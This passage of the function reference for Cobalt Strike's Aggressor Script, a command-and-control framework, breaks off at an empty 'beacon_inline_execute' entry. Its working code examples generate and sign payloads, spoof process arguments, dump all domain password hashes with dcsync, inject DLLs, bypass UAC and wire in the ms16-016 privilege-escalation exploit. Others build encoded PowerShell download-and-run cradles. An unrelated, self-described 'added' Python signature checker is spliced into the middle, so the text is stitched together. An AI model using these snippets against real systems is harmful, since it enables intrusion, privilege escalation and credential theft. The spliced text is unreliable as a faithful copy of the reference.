Functions

The following is a list of Aggressor Script's functions:

-hasbootstraphint

Check if a byte array has the x86 or x64 bootstrap hint. Use this function to determine if it's safe to use an artifact that passes GetProcAddress/GetModuleHandleA pointers to this payload.

Arguments

$1 - byte array with a payload or shellcode.

See also

&payload_bootstrap_hint

-is64

Check if a session is on an x64 system or not (Beacon only).

Arguments

$1 - Beacon/Session ID

Example

command x64 {
   foreach $session (beacons()) {
      if (-is64 $session['id']) {
         println($session);
      }
   }
}

-isactive

Check if a session is active or not. A session is considered active if (a) it has not acknowledged an exit message AND (b) it is not disconnected from a parent Beacon.

Arguments

$1 - Beacon/Session ID

Example

command active {
   local('$bid');
   foreach $bid (beacon_ids()) {
      if (-isactive $bid) {
         println("$bid is active!");
      }
   }
}

-isadmin

Check if a session has admin rights.

Arguments

$1 - Beacon/Session ID

Example

command admin_sessions {
   foreach $session (beacons()) {
      if (-isadmin $session['id']) {
         println($session);
      }
   }
}

-isbeacon

Check if a session is a Beacon or not.

Arguments

$1 - Beacon/Session ID

Example

command beacons {
   foreach $session (beacons()) {
      if (-isbeacon $session['id']) {
         println($session);
      }
   }
}

-isssh

Check if a session is an SSH session or not.

Arguments

$1 - Beacon/Session ID

Example

command ssh_sessions {
   foreach $session (beacons()) {
      if (-isssh $session['id']) {
         println($session);
      }
   }
}

action

Post a public action message to the event log. This is similar to the /me command.

Arguments

$1 - the message

Example

action("dances!");

addTab

Create a tab to display a GUI object.

Arguments

$1 - the title of the tab

$2 - a GUI object. A GUI object is one that is an instance of javax.swing.JComponent.

$3 - a tooltip to display when a user hovers over this tab.

Example

$label = [new javax.swing.JLabel: "Hello World"];
addTab("Hello!", $label, "this is an example");

addVisualization

Register a visualization with Cobalt Strike.

Arguments

$1 - the name of the visualization

$2 - a javax.swing.JComponent object

Example

$label = [new javax.swing.JLabel: "Hello World!"];
addVisualization("Hello World", $label);

See also

&showVisualization

add_to_clipboard

Add text to the clipboard, notify the user.

Arguments

$1 - the text to add to the clipboard

Example

add_to_clipboard("Paste me you fool!");

alias

Creates an alias command in the Beacon console

Arguments

$1 - the alias name to bind to

$2 - a callback function. Called when the user runs the alias. Arguments are: $0 = command run, $1 = beacon id, $2 = arguments.

Example

alias("foo", {
   btask($1, "foo!");
});

See Also

User Defined Tab Completion

alias_clear

Removes an alias command (and restores the default functionality, if one existed).

Arguments

$1 - the alias name to remove

Example

alias_clear("foo");

all_payloads

Generates all of the stageless payloads (in x86 and x64) for all of the configured listeners. (also available in the UI menu under Payloads -> Windows Stageless Generate all Payloads)

Arguments

$1 - The folder path to create the payloads in.

$2 - A boolean value for whether the executable files should be signed.

$3 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

$4 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).

Example

$folder = all_payloads("/tmp/payloads", 1, "None");
println("Payloads have been saved to $folder");

applications

Returns a list of application information in Cobalt Strike's data model. These applications are results from the System Profiler.

Returns

An array of dictionary objects with information about each application.

Example

printAll(applications());

archives

Returns a massive list of archived information about your activity from Cobalt Strike's data model. This information is leaned on heavily to reconstruct your activity timeline in Cobalt Strike's reports.

Returns

An array of dictionary objects with information about your team's activity.

Example

foreach $index => $entry (archives()) {
   println("\c3( $+ $index $+ )\o $entry");
}

artifact

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager instead.

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - deprecated; this parameter no longer has any meaning.

$4 - x86|x64 - the architecture of the generated stager

Type Description
dll an x86 DLL
dllx64 an x64 DLL
exe a plain executable
powershell a powershell script
python a python script
svcexe a service executable
vbscript a Visual Basic script

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact("my listener", "exe");

$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

artifact_general

Generates a payload artifact from arbitrary shellcode.

Arguments

$1 - the shellcode

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload

Type Description
dll a DLL
exe a plain executable
powershell a powershell script
python a python script
svcexe a service executable

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload, this function will only populate the script with the architecture specified in $3.

artifact_payload

Generates a stageless payload artifact (exe, dll) from a Cobalt Strike listener name

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

$4 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$5 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

Type Description
dll a DLL
exe a plain executable
powershell a powershell script
python a python script
raw raw payload stage
svcexe a service executable

$6 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload, this function will only populate the script with the architecture specified in $3.

Example

$data = artifact_payload("my listener", "exe", "x86", "process", "Indirect");

artifact_sign

Sign an EXE or DLL file

Arguments

$1 - the contents of the EXE or DLL file to sign

Notes

  • This function requires that a code-signing certificate is specified in this server's Malleable C2 profile. If no code-signing certificate is configured, this function will return $1 with no changes.
  • DO NOT sign an executable or DLL twice. The library Cobalt Strike uses for code-signing will create an invalid (second) signature if the executable or DLL is already signed.

Returns

A scalar containing the signed artifact.

Example

# generate an artifact!
$data = artifact("my listener", "exe");

# sign it.
$data = artifact_sign($data);

# save it
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);
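
The double-signing caveat above can be checked for from the analyst's side: a PE file's security directory is a chain of WIN_CERTIFICATE entries, and a binary signed a second time by a tool that does not merge signatures carries two of them. The following Python is an added example, not Cobalt Strike code or part of this reference: it walks the security directory and counts the entries. build_sample_pe is a constructed minimal PE32 header used only as offline test input; the code assumes a well-formed PE header and does not validate the signature contents themselves.

```python
"""Count WIN_CERTIFICATE entries in a PE file's security directory (added
example; assumes a well-formed PE header, does not verify the signatures)."""
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
WIN_CERT_REVISION_2_0 = 0x0200
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002


def _security_directory(pe: bytes):
    """Return (file_offset, size) of the security directory, or (0, 0) if absent.
    Unlike other directories, the security directory's address is a file offset."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt_hdr = e_lfanew + 4 + 20            # skip PE signature and COFF file header
    magic = struct.unpack_from("<H", pe, opt_hdr)[0]
    if magic == PE32_MAGIC:
        dir_base = opt_hdr + 96            # data directories start at +96 in PE32
    elif magic == PE32PLUS_MAGIC:
        dir_base = opt_hdr + 112           # ... and at +112 in PE32+
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    num_dirs = struct.unpack_from("<I", pe, dir_base - 4)[0]   # NumberOfRvaAndSizes
    if num_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return 0, 0
    entry = dir_base + IMAGE_DIRECTORY_ENTRY_SECURITY * 8
    return struct.unpack_from("<II", pe, entry)


def count_signatures(pe: bytes) -> int:
    """Walk the WIN_CERTIFICATE chain and count entries. Raises on a chain whose
    length fields run past the directory, which is itself a sign of tampering."""
    offset, size = _security_directory(pe)
    if size == 0:
        return 0
    end = offset + size
    if end > len(pe):
        raise ValueError("security directory extends past end of file")
    count, pos = 0, offset
    while pos + 8 <= end:
        length, _revision, _cert_type = struct.unpack_from("<IHH", pe, pos)
        if length < 8 or pos + length > end:
            raise ValueError(f"bad WIN_CERTIFICATE length {length} at {pos:#x}")
        count += 1
        pos += (length + 7) & ~7           # entries are padded to 8-byte boundaries
    return count


def double_signed(pe: bytes) -> bool:
    """True when the file carries more than one certificate entry."""
    return count_signatures(pe) > 1


def build_sample_pe(cert_blobs) -> bytes:
    """Construct a minimal PE32 header (not a runnable executable) whose security
    directory holds one WIN_CERTIFICATE per blob. Constructed test input only."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: i386, no sections, 224-byte optional header, EXECUTABLE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    # PE32 optional header up to NumberOfRvaAndSizes (16 directories follow)
    opt = struct.pack("<H", PE32_MAGIC) + b"\0" * (92 - 2) + struct.pack("<I", 16)
    headers_len = len(dos) + 4 + len(coff) + len(opt) + 16 * 8
    cert_table = b""
    for blob in cert_blobs:
        entry = struct.pack("<IHH", 8 + len(blob), WIN_CERT_REVISION_2_0,
                            WIN_CERT_TYPE_PKCS_SIGNED_DATA) + blob
        entry += b"\0" * ((-len(entry)) % 8)
        cert_table += entry
    dirs = [(0, 0)] * 16
    if cert_table:
        dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = (headers_len, len(cert_table))
    dir_bytes = b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    return dos + b"PE\0\0" + coff + opt + dir_bytes + cert_table


if __name__ == "__main__":
    for label, blobs in (("unsigned", []), ("signed once", [b"A" * 20]),
                         ("signed twice", [b"A" * 20, b"B" * 13])):
        sample = build_sample_pe(blobs)
        print(f"{label}: {count_signatures(sample)} entries, double={double_signed(sample)}")
```

On a real file, read the bytes and call count_signatures on them; the same walk works for PE32+ images because the directory offset is selected from the optional header magic.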

artifact_stageless

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_payload instead.

Generates a stageless artifact (exe, dll) from a (local) Cobalt Strike listener

Arguments

$1 - the listener name (must be local to this team server)

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

$4 - proxy configuration string

$5 - callback function. This function is called when the artifact is ready. The $1 argument is the stageless content.

Type Description
dll an x86 DLL
dllx64 an x64 DLL
exe a plain executable
powershell a powershell script
python a python script
raw raw payload stage
svcexe a service executable

Notes

  • This function provides the stageless artifact via a callback function. This is necessary because Cobalt Strike generates payload stages on the team server.
  • The proxy configuration string is the same string you would use with Payloads -> Windows Stageless Payload. *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:password@host:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior. Custom dialogs may use &drow_proxyserver to set this.
  • This function cannot generate artifacts for listeners on other team servers. This function also cannot generate artifacts for foreign listeners. Limit your use of this function to local listeners with stages only. Custom dialogs may use &drow_listener_stage to choose an acceptable listener for this function.
  • Note: while the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload, this function will only populate the script with the architecture specified in $3.

Example

sub ready {
   local('$handle');
   $handle = openf(">out.exe");
   writeb($handle, $1);
   closef($handle);
}

artifact_stageless("my listener", "exe", "x86", "", &ready);

artifact_stager

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated stager

Type Description
dll a DLL
exe a plain executable
powershell a powershell script
python a python script
raw the raw file
svcexe a service executable
vbscript a Visual Basic script

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact_stager("my listener", "exe", "x86");
 
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

barch

Returns the architecture of your Beacon session (e.g., x86 or x64)

Arguments

$1 - the id for the beacon to pull metadata for

Note

If the architecture is unknown (e.g., a DNS Beacon that hasn't sent metadata yet); this function will return x86.

Example

println("Arch is: " . barch($1));

bargue_add

This function adds an option to Beacon's list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

$3 - the fake arguments to use when the specified command is run.

Notes

  • The process match is exact. If Beacon tries to launch "net.exe", it will not match net, NET.EXE, or c:\windows\system32\net.exe. It will only match net.exe.
  • x86 Beacon can only spoof arguments in x86 child processes. Likewise, x64 Beacon can only spoof arguments in x64 child processes.
  • The real arguments are written to the memory space that holds the fake arguments. If the real arguments are longer than the fake arguments, the command launch will fail.

Example

# spoof cmd.exe arguments.
bargue_add($1, "%COMSPEC%", "/K \"cd c:\windows\temp & startupdatenow.bat\"");

# spoof net arguments
bargue_add($1, "net", "user guest /active:no");

bargue_list

List the commands + fake arguments Beacon will spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bargue_list($1);

bargue_remove

This function removes an option to Beacon's list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

Example

# don't spoof cmd.exe
bargue_remove($1, "%COMSPEC%");

base64_decode

Unwrap a base64-encoded string

Arguments

$1 - the string to decode

Returns

The argument processed by a base64 decoder

Example

println(base64_decode(base64_encode("this is a test")));

base64_encode

Base64 encode a string

Arguments

$1 - the string to encode

Returns

The argument processed by a base64 encoder

Example

println(base64_encode("this is a test"));

bbeacon_config

Use this script function with the host command to view and update a Beacon's status and configuration. Use the failover_notification command to control Beacon failover notifications.

Failover_Notification Command

Use this command to retrieve the current notification setting from a Beacon [HTTP|DNS]. Use the [true|false] argument to enable or disable notifications from a Beacon [HTTP|DNS] when host rotation occurs because of failover events.

bbeacon_config failover_notification [true | false]

Example

$beacon_id = $1;
bbeacon_config($beacon_id, "failover_notification");
bbeacon_config($beacon_id, "failover_notification", "true");
bbeacon_config($beacon_id, "failover_notification", "false");

Host Command

Use this command to view and update beacon status and configuration of the beacons callback host list.

bbeacon_config [host] [action] [arguments]

where Action and Arguments can be:

Action - Description - Arguments

add - Add a host/uri to the beacon's callback host list. The uri must be known by the server. A maximum of 32 hosts may be defined. - [hostname] [uri]
info - Retrieve host callback information from a beacon. - (none)
hold - Hold a host in the callback host list (Random and Round-Robin rotation only). - [hostname]
profiles - List the host profiles available in the beacon config. - (none)
release - Release a host in the callback host list (Random and Round-Robin rotation only). - [hostname]
remove - Remove a host from the beacon's callback host list. - [hostname]
reset - Reset the status and/or statistics for callback hosts. - [all|status|statistics] [hostname]
update - Change the host/uri of an existing host/uri in the host list. The uri must be known by the server. - [original-hostname] [new-hostname] [new-uri]

Examples

Add a host to host list

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "add", [hostname], [uri]);

Remove a host

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "remove", [hostname]);

Change a host name

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "update", [original-hostname], [new-hostname]);
bbeacon_config($beacon_id, "host", "update", [original-hostname], [new-hostname], [new-uri]);

List defined host profile host names

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "profiles");

Retrieve host callback information

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "info");

Reset status/statistics

$beacon_id = $1;
bbeacon_config($beacon_id, "host", "reset", "[all|status|statistics]");
bbeacon_config($beacon_id, "host", "reset", "[all|status|statistics]", [hostname]);

NOTE:

Resetting status will reset:

- Host held setting

Resetting statistics will reset:

- Last successful connection timestamp

- Last failed connection timestamp

- Successful connection count

- Failed connection count

bblockdlls

Launch child processes with binary signature policy that blocks non-Microsoft DLLs from loading in the process space.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - true or false; block non-Microsoft DLLs in child process

Note

This attribute is available in Windows 10 only.

Example

on beacon_initial {
   binput($1, "blockdlls start");
   bblockdlls($1, true);
}

bbrowser

Generate the beacon browser GUI component. Shows only Beacons.

Returns

The beacon browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Beacon Browser", bbrowser());

See also

&showVisualization

bbrowserpivot

Start a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the browser pivot agent into.

$3 - the architecture of the target PID (x86|x64)

Example

bbrowserpivot($1, 1234, "x86");

bbrowserpivot_stop

Stop a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bbrowserpivot_stop($1);

bbypassuac

REMOVED Removed in Cobalt Strike 4.0.

bcancel

Cancel a file download

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to cancel or a wildcard.

Example

item "&Cancel Downloads" {
   bcancel($1, "*");
}

bcd

Ask a Beacon to change its current working directory.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to change to.

Example

# create a command to change to the user's home directory
alias home {
   $home = "c:\\users\\" . binfo($1, "user");
   bcd($1, $home);
}

bcheckin

Ask a Beacon to checkin. This is basically a no-op for Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Checkin" {
   binput($1, "checkin");
   bcheckin($1);
}

bclear

This is the "oops" command. It clears the queued tasks for the specified beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bclear($1);

bclipboard

Ask beacon to get the text clipboard contents.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bclipboard($1);

bconnect

Ask Beacon (or SSH session) to connect to a Beacon peer over a TCP socket

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to connect to

$3 - (optional) the port to use. Default profile port is used otherwise.

Note

Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

bconnect($1, "DC");

bcovertvpn

Ask Beacon to deploy a Covert VPN client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the Covert VPN interface to deploy

$3 - the IP address of the interface [on target] to bridge into

$4 - (optional) the MAC address of the Covert VPN interface

Example

bcovertvpn($1, "phear0", "172.16.48.18");

bcp

Ask Beacon to copy a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to copy

$3 - the destination

Example

bcp($1, "evil.exe", "\\\\target\\C$\\evil.exe");

bdata

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(bdata("1234"));

bdata_store_list

List the post-ex items currently available in the data store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bdata_store_list($1);

bdata_store_load

Load post-ex items to Beacon. This provides a mechanism to upload data and then query it via BOFs using APIs such as BeaconStoreGetItem().

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - item type [bof|dotnet|file]

$3 - file path

$4 - (optional) item name (If omitted, the file name is used).

Example

alias "data_store_load" {
   blog($1, "Loading data store...");
   bdata_store_load($1, "bof", "/home/someone/file.bof");
   bdata_store_load($1, "dotnet", "/home/someone/file.dotnet");
   bdata_store_load($1, "file", "/home/someone/file.data");
   blog($1, "Loaded data store...");
}

alias "data_store_load_with_name" {
   blog($1, "Loading data store with names...");
   bdata_store_load($1, "bof", "/home/someone/file.bof", "myBof");
   bdata_store_load($1, "dotnet", "/home/someone/file.dotnet", "myDotNet");
   bdata_store_load($1, "file", "/home/someone/file.data", "myData");
   blog($1, "Loaded data store with names...");
}

bdata_store_unload

Remove specific post-ex item from the store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - index

Example

bdata_store_unload($1, parseNumber($2));

bdcsync

Use mimikatz's dcsync command to pull a user's password hash from a domain controller. This function requires a domain administrator trust relationship.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - fully qualified name of the domain

$3 - (optional) DOMAIN\user to pull hashes for

$4 - (optional) the PID to inject the dcsync command into or $null

$5 - (optional) the architecture of the target PID (x86|x64) or $null

Note

If $3 is left out, dcsync will dump all domain hashes.

Examples

Spawn a temporary process

# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator");

# dump all accounts
bdcsync($1, "PLAYLAND.testlab");

Inject into the specified process

# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator", 1234, "x64");

# dump all accounts
bdcsync($1, "PLAYLAND.testlab", $null, 1234, "x64");

bdesktop

Start a VNC session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Desktop (VNC)" {
   bdesktop($1); 
}

bdllinject

Inject a Reflective DLL into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the DLL into

$3 - the local path to the Reflective DLL

Example

bdllinject($1, 1234, script_resource("test.dll"));

bdllload

Call LoadLibrary() in a remote process with the specified DLL.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target process PID

$3 - the on-target path to a DLL

Note

The DLL must be the same architecture as the target process.

Example

bdllload($1, 1234, "c:\\windows\\mystuff.dll");

bdllspawn

Spawn a Reflective DLL as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the Reflective DLL

$3 - a parameter to pass to the DLL

$4 - a short description of this post exploitation job (shows up in jobs output)

$5 - wait time for returned data specified in milliseconds (5000 = 5 seconds)

$6 - true/false; use impersonated token when running this post-ex job?

$7 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Notes

  • This function will spawn an x86 process if the Reflective DLL is an x86 DLL. Likewise, if the Reflective DLL is an x64 DLL, this function will spawn an x64 process.
  • A well-behaved Reflective DLL follows these rules:
    • Receives a parameter via the reserved DllMain parameter when the DLL_PROCESS_ATTACH reason is specified.
    • Prints messages to STDOUT
    • Calls fflush(stdout) to flush STDOUT
    • Calls ExitProcess(0) when done. This kills the process that was spawned to host the capability.

Example (ReflectiveDll.c)

This example is based on Stephen Fewer's Reflective DLL Injection Project:

#include "ReflectiveLoader.h"
#include <stdio.h>

/* defined and set by ReflectiveLoader.c; usable as a pseudo hinstDLL value */
extern HINSTANCE hAppInstance;

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
   BOOL bReturnValue = TRUE;
   switch( dwReason ) {
      case DLL_QUERY_HMODULE:
         if( lpReserved != NULL )
            *(HMODULE *)lpReserved = hAppInstance;
         break;
      case DLL_PROCESS_ATTACH:
         hAppInstance = hinstDLL;

         /* print some output to the operator */
         if (lpReserved != NULL) {
            printf("Hello from test.dll. Parameter is '%s'\n", (char *)lpReserved);
         }
         else {
            printf("Hello from test.dll. There is no parameter\n");
         }

         /* flush STDOUT */
         fflush(stdout);

         /* we're done, so let's exit */
         ExitProcess(0);
         break;
      case DLL_PROCESS_DETACH:
      case DLL_THREAD_ATTACH:
      case DLL_THREAD_DETACH:
         break;
   }
   return bReturnValue;
}

Example (Aggressor Script)

alias hello {
   bdllspawn($1, script_resource("reflective_dll.dll"), $2, "test dll", 5000, false);
}

bdownload

Ask a Beacon to download a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to request

Example

bdownload($1, "c:\\sysprep.inf");

bdrives

Ask Beacon to list the drives on the compromised system

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Drives" {
   binput($1, "drives");
   bdrives($1);
}

beacon_command_describe

Describe a Beacon command.

Returns

A string description of the Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_describe("ls"));

beacon_command_detail

Get the help information for a Beacon command.

Returns

A string with helpful information about a Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_detail("ls"));

beacon_command_register

Register help information for a Beacon command.

Arguments

$1 - the command

$2 - the short description of the command

$3 - the long-form help for the command.

Example

alias echo {
   # $0 is the full command line; skip the leading "echo "
   blog($1, "You typed: " . substr($0, 5));
}

beacon_command_register(
   "echo", 
   "echo text to beacon log", 
   "Synopsis: echo [arguments]\n\nLog arguments to the beacon console");

See Also

User Defined Tab Completion

beacon_commands

Get a list of Beacon commands.

Returns

An array of Beacon commands.

Example

printAll(beacon_commands());

beacon_data

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(beacon_data("1234"));

beacon_elevator_describe

Describe a Beacon command elevator exploit

Returns

A string description of the Beacon command elevator

Arguments

$1 - the exploit

Example

println(beacon_elevator_describe("uac-token-duplication"));

See Also

&beacon_elevator_register, &beacon_elevators, &belevate_command

beacon_elevator_register

Register a Beacon command elevator with Cobalt Strike. This adds an option to the runasadmin command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 the command and arguments)

Example

# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub schtasks_elevator {
   local('$handle $script $oneliner $command');

   # acknowledge this command
   btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");

   # read in the script
   $handle = openf(getFileProper(script_resource("modules"), "Invoke-EnvBypass.ps1"));
   $script = readb($handle, -1);
   closef($handle);

   # host the script in Beacon
   $oneliner = beacon_host_script($1, $script);

   # base64 encode the command
   $command  = transform($2, "powershell-base64");

   # run the specified command via this exploit.
   bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $command $+ \"", $oneliner);
}

beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via SilentCleanup)", &schtasks_elevator);

See Also

&beacon_elevator_describe, &beacon_elevators, &belevate_command

beacon_elevators

Get a list of command elevator exploits registered with Cobalt Strike.

Returns

An array of Beacon command elevators

Example

printAll(beacon_elevators());

See also

&beacon_elevator_describe, &beacon_elevator_register, &belevate_command

beacon_execute_job

Run a command and report its output to the user.

Arguments

$1 - the Beacon ID

$2 - the command to run (environment variables are resolved)

$3 - the command arguments (environment variables are not resolved).

$4 - flags that change how the job is launched (e.g., 1 = disable WOW64 file system redirection)

Notes

  • The strings $2 and $3 are combined as-is into a command line. Make sure you begin $3 with a space!
  • This is the mechanism Cobalt Strike uses for its shell and powershell commands.

Example

alias shell {
   local('$args');
   $args = substr($0, 6);
   btask($1, "Tasked beacon to run: $args", "T1059");
   beacon_execute_job($1, "%COMSPEC%", " /C $args", 0);
}

beacon_execute_postex_job

Execute a user defined post exploitation task.

Arguments

$1 - the PID to inject the task into, or $null to use fork&run

$2 - a string containing the postex DLL

$3 - (optional) packed arguments to pass to the postex task

$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

$5 - (optional) the message id type for the postex task. Defaults to CALLBACK_POSTEX_KIT

See Also:

Postex Kit

beacon_exploit_describe

Describe a Beacon exploit

Returns

A string description of the Beacon exploit

Arguments

$1 - the exploit

Example

println(beacon_exploit_describe("ms14-058"));

See Also

&beacon_exploit_register, &beacon_exploits, &belevate

beacon_exploit_register

Register a Beacon privilege escalation exploit with Cobalt Strike. This adds an option to the elevate command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the listener)

Example

# Integrate windows/local/ms16_016_webdav from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb

sub ms16_016_exploit {
   local('$stager');
   
   # check if we're on an x64 system and error out.
   if (-is64 $1) {
      berror($1, "ms16-016 exploit is x86 only");
      return;
   }

   # acknowledge this command
   btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");

   # generate our shellcode
   $stager = payload($2, "x86");

   # spawn a Beacon post-ex job with the exploit DLL
   bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);

   # link to our payload if it's a TCP or SMB Beacon
   beacon_link($1, $null, $2);
}

beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);

See Also

&beacon_exploit_describe, &beacon_exploits, &belevate

beacon_exploits

Get a list of privilege escalation exploits registered with Cobalt Strike.

Returns

An array of Beacon exploits.

Example

printAll(beacon_exploits());

See also

&beacon_exploit_describe, &beacon_exploit_register, &belevate

beacon_host_imported_script

Locally host a previously imported PowerShell script within Beacon and return a short script that will download and invoke this script.

Arguments

$1 - the id of the Beacon to host this script with.

Returns

A short PowerShell script that downloads and evaluates the previously imported script when run. How this one-liner is used is up to you!

Example

alias powershell {
   local('$args $cradle $runme $cmd');
   
   # $0 is the entire command with no parsing.
   $args   = substr($0, 11);
   
   # generate the download cradle (if one exists) for an imported PowerShell script
   $cradle = beacon_host_imported_script($1);
   
   # encode our download cradle AND cmdlet+args we want to run
   $runme  = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
   
   # Build up our entire command line.
   $cmd    = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
   
   # task Beacon to run all of this.
   btask($1, "Tasked beacon to run: $args", "T1086");
   beacon_execute_job($1, "powershell", $cmd, 1);
}

Back to Top

beacon_host_script

Locally host a PowerShell script within Beacon and return a short script that will download and invoke this script. This function is a way to run large scripts when there are constraints on the length of your PowerShell one-liner.

Arguments

$1 - the id of the Beacon to host this script with.

$2 - the script data to host.

Returns

A short PowerShell script to download and evaluate the script when run. How this one-liner is used is up to you!

Example

alias test {
   local('$script $hosted');
   $script = "2 + 2";
   $hosted = beacon_host_script($1, $script);
   
   binput($1, "powerpick $hosted");
   bpowerpick($1, $hosted);
}

Back to Top

beacon_ids

Get the ID of all Beacons calling back to this Cobalt Strike team server.

Returns

An array of beacon IDs

Example

foreach $bid (beacon_ids()) {
   println("Bid: $bid");
}

Back to Top

beacon_info

Get information from a Beacon session's metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns

A string with the requested information.

Example

println("User is: " . beacon_info("1234", "user"));
println("PID  is: " . beacon_info("1234", "pid"));

Back to Top

beacon_inline_execute

